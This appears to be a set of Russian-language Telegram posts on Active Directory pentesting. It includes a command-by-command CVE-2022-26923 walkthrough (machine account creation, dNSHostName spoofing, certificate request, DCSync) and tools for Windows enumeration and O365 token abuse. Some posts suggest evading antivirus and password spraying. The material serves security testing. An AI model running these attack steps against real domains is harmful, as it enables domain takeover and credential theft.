💻 Seatbelt
#AD #pentest

Тулза написанная на C#, которая выполняет огромное количество проверок безопасности Windows/AD. Активно развивается. Количество доступных команд в данном инструменте поражает воображение. Поэтому те, кто ещё не знали о нём, срочно сохраняем его)

🗓 Эта тулза подходит под запрос: "хочу это, хочу то, получаю всё".

💻 На Github по умолчанию она не скомпилирована, поэтому я сделал это за вас, пользуйтесь за здоровье :)
Положил exeшник в чате.

Использование:

.\Seatbelt.exe -group=all
.\Seatbelt.exe -group=user
.\Seatbelt.exe -group=system
.\Seatbelt.exe -group=remote
.\Seatbelt.exe -group=misc

🛡 Каспер по дефолту удаляет Seatbelt, так что вам нужно будет пошаманить над ним)

🌚 @poxek

Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:

# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10

Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer

addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'

Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:

Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:

certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:

secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD

Перечислить всех. Красота русских фамилий как фактор уязвимости в пентестах Active Directory
#windows #AD

Во время очередного пентест-проекта на внешнем периметре Заказчика была обнаружена широко известная в узких кругах пентестеров инфраструктурная служба Outlook Web Access (OWA). OWA примечательна тем, что это WEB-интерфейс почтового сервера Microsoft Exchange. Скорее всего, вы слышали, как минимум о нескольких громких уязвимостях OWA. С 2020 года существует подробный ресерч от коллег из PT SWARM на тему безопасности MS Exchange WEB-интерфейсов, а новые атаки появляются с завидной частотой. В одном из подкастов я слышал, что в OWA имеется огромный архитектурный баг, который является драйвером целого семейства подобных уязвимостей.

Атак достаточно, но есть еще и очень приятная “фича” в OWA – перечисление существующих пользователей в зависимости от времени ответов сервера. После формирования списка однозначно существующих учетных записей можно провести атаку типа Password Spray (англ. Распыление паролей) и с небольшим шансом подобрать пароль типа «P@ssw0rd!» среди пары сотен пользователей.

Многим пентестерам это известно, но мне удалось найти ультимативный способ проведения этой атаки за счет избыточности русских фамилий (sic!). Сперва рассмотрим проблематику.

❤️ Спасибо @CuriV за подробный ресерч!

➡️ Читать далее

🌚 @poxek

Kerberos простыми словами
#windows #kerberos #AD

Несмотря на то, что уже существует множество различных статей про Kerberos, я всё‑таки решил написать ещё одну. Прежде всего эта статья написана для меня лично: я захотел обобщить знания, полученные в ходе изучения других статей, документации, а также в ходе практического использования Kerberos. Однако я также надеюсь, что статья будет полезна всем её читателям и кто‑то найдёт в ней новую и полезную информацию.

Данную статью я написал после того, как сделал собственную библиотеку, генерирующую сообщения протокола Kerberos, а также после того, как я сделал и протестировал «стандартный клиент» Kerberos в Windows — набор функций SSPI. Я научился тестировать произвольные конфигурации сервисов при всех возможных видах делегирования. Я нашёл способ, как выполнять пре‑аутентификацию в Windows как с применением имени пользователя и пароля, так и с помощью PKINIT. Я также сделал библиотеку, которая умещает «стандартный» код для запроса к SSPI в 3–5 строк вместо, скажем, 50-ти.

by @yurystrozhevsky

➡️ Читать далее

🌚 @poxek

😑 GraphSpy
#AD #Windows #O365

Инструмент первоначального доступа и последующей эксплуатации для AAD и O365 с GUI на основе браузера.

Написана на python + html/css/js

Установка:

# Установка pipx (пропустите, если уже установлен)
apt install pipx
pipx ensurepath

# Установка GraphSpy
pipx install graphspy

После установки приложение можно запустить с помощью команды graphspy.

Запуск GraphSpy без каких-либо аргументов приведет к запуску по умолчанию по адресу http://127.0.0.1:5000.

У GraphSpy множество функций, так давайте разберемся в них:

Токены доступа и обновления — храните токены доступа и обновления для нескольких пользователей и диапазонов в одном месте. Легко переключайтесь между ними или запрашивайте новые маркеры доступа с любой страницы.

Девайс коды — легко создавайте и опрашивайте сразу несколько кодов устройств. Если пользователь использовал код устройства для аутентификации, GraphSpy автоматически сохранит токен доступа и обновления в своей базе данных.

Файлы и SharePoint — просмотр файлов и папок в OneDrive пользователя или на любом доступном SharePoint с помощью user-friendly интерфейса проводника файлов. Конечно, файлы можно загружать и напрямую. Кроме того, в списке отображаются недавно открытые файлы пользователя или файлы, к которым он имеет общий доступ.

Outlook — можно одним нажатием открывать Outlook использовав только Outlook access token

Графовый поиск — поиск по ключевым словам во всех приложениях Microsoft 365 с помощью Microsoft Search API. Например, поиск любых файлов или электронных писем, содержащих ключевые слова, как "пароль", "конфиденциально" и т.д.

Кастомные запросы — можно выполнять собственные API-запросы к любому endpoint'у, используя токены доступа, хранящиеся в GraphSpy.

Поддержки нескольких БД — GraphSpy поддерживает несколько баз данных. Это удобно при одновременной работе над несколькими проектами, чтобы хранить токены и коды устройств в порядке.

Ну и куда же без нашей любимой тёмной темы)) 🌚

💻 Github

🌚 @poxek

❌ PingCastle Notify ✅
#red_team #AD #windows

Я думаю все кто занимались пентестом инфры AD дольше 1 дня знакомы с PingCastle. Классная тулза, которая может проверять AD на мисконфиги и уязвимости. В ней удобно очень много чего. Она умеет как в обычный health check безопасности AD, до чуть ли не готовой презентации для руководства.

Недавно заходила речь о построении CVM (continuous vuln management) внутрянки. И я задавался вопросом, а как его сделать. Поставить тупо nuclei во внутренний контур мало, а какой-то ещё удобной автоматизации нет, шоб с отчётиками красивыми и/или понятными. Так вот нашёл для вас удобную автоматизацию, тем более с интеграцией в Teams/Slack(им кто-то ещё пользуется?).

Это небольшой powershell скрипт, который будет мониторить изменения в отчётах, к примеру pingcastle нашёл новую вулну, вам прилетит уведомление, что-то пропатчили, вам опять же придёт уведомление. Удобно? Очень!

Подготовка:
➡️Скачиваете последнюю версию с сайта.
➡️Разархивируете
➡️Создаете папку Reports внутри PingCastle
➡️Кладёте скрипт PingCastle-Notify.ps1 в корень PingCastle

Далее потребуется настроить уведомления, следовательно создать бота ТЫК

Наконец создать повторяющийся таск в AD ТЫК

По сути всё, мы собрали бюджетный CVM AD на коленки.

🌚 @poxek

Паук в Active Directory так лапками тыдык тыдык
#windows #activedirectory #AD

В чем соль: у нас уже есть достаточно известные утилиты, чтобы «отслеживать» изменения в Active Directory. Почему в кавычках? Потому что все подобные утилиты (ну, практически) используют один и тот же механизм под капотом: Get-ADObject -Filter * (выкачиваем информацию обо всех объектах и их свойствах) и далее просто парсим эти результаты на своем клиенте и ищем изменения.

Но при таком подходе есть некоторые нюансы:

Если вы когда-нибудь использовали подобную команду в отношении большого домена, то вы знаете, что выполнение этой команды может занимать очень большое время и неплохо так нагружает сеть. А если домен разрастается еще больше (20, 30, 50 тысяч объектов), то от этого плана вообще можно отказаться. Выполнение команды будет длиться бесконечно, время вывода информации растягивается (если кто собирал BloodHound с больших доменов, то понимает, о чем я). Можно, конечно, поставить задержку между запросами, но тогда возможность пропустить некоторые изменения увеличивается.

Но возможность пропустить события и так присутствует: если в рамках одного запроса было несколько изменений одного свойства, то вы не только пропустите значение свойства, но и вообще можете не узнать об изменениях. Например, можно пропустить включение/выключение какой-нибудь УЗ (true/false) (а если это админ какой-нибудь?)

Есть свойства, которые под собой содержат другие объекты, а в значении свойства содержится просто их название. Например, nTSecurityDescriptor. И здесь без раскрытия и проработки каждого свойства мы рискуем пропустить изменения. А это дополнительное время и ресурсы.

➡️ Читать дальше

P.S. давно не было постов, пока работы много и по врачам хожу. Есть несколько интересных задумок, которые будут раскрыты в ближайшее время. Они не только на ИБэшников направлены, но цель сделать мир чуть лучше)

🌚 @poxek | 📹 YouTube

💻 Базовые атаки на AD. Разбираем Kerberoasting, AS-REP Roasting и LLMNR Poisoning
#AD #microsoft #windows

В этой статье автор показал нес­коль­ко атак на Active Directory, пореко­мен­довал ути­литы для экс­плу­ата­ции и рас­ска­зал об инди­като­рах, на которые нуж­но обра­щать вни­мание при рас­сле­дова­нии инци­ден­тов. А упражнять­ся будем на лабора­тор­ных работах Sherlocks с пло­щад­ки Hack The Box.

🔓 xakep.ru

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча